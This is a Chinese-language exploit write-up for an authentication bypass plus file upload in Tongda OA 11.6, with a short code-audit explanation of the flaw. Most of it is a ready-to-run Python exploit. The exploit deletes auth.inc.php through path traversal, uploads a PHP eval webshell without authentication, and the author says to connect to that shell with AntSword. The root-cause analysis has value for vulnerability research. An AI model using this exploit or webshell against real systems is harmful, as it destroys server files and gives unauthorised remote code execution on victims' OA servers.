通达OA11.6身份验证绕过+文件上传

环境安装

11.6OA
链接：https://pan.baidu.com/s/1tmqpaq5NnY3edshJExxqQg 
提取码：z33a 
源码解密工具
链接：https://pan.baidu.com/s/1LbdVhaVInbMxQoAM4g4VKg 
提取码：nrtw

 

 

 漏洞利用

import requests
target="http://192.168.202.151"
payload="<?php @eval($_REQUEST[777])?>"
print("[*]Warning,This exploit code will DELETE auth.inc.php which may damage the OA")
input("Press enter to continue")
print("[*]Deleting auth.inc.php....")

url=target+"/module/appbuilder/assets/print.php?guid=../../../webroot/inc/auth.inc.php"
requests.get(url=url)
print("[*]Checking if file deleted...")
url=target+"/inc/auth.inc.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[-]Failed to deleted auth.inc.php")
    exit(-1)
print("[+]Successfully deleted auth.inc.php!")
print("[*]Uploading payload...")
url=target+"/general/data_center/utils/upload.php?action=upload&filetype=nmsl&repkid=/.<>./.<>./.<>./"
files = {'FILE1': ('yjh.php', payload)}
#files = {'FILE1': payload}
requests.post(url=url,files=files)
url=target+"/_yjh.php"
page=requests.get(url=url).text
if 'No input file specified.' not in page:
    print("[+]Filed Uploaded Successfully")
    print("[+]URL:",url)
else:
    print("[-]Failed to upload file")

 运行exp,蚁剑连接_yjh.php

 

漏洞分析+代码审计

通达OA的源码是加密的，使用seayDzend进行解密。

 

1.通过可控变量guid控制目标文件路径，使函数unlink删除auth.inc.php文件。

2.upload.php上传所需的认证是通过包含auth.inc.php的，include_once是一次包含报错后继续执行程序，所以此时上传就无需认证直接上传文件。

3.action==upload进入if语句，85行为文件名，88行进行对文件名进行拼接，可控$repkid控制存放目录。91行为最终存放目录。因为/data_center/attachment没有执行权限所以先进行目录的跳转。

4.nginx配置文件中控制了attachment目录的执行权限。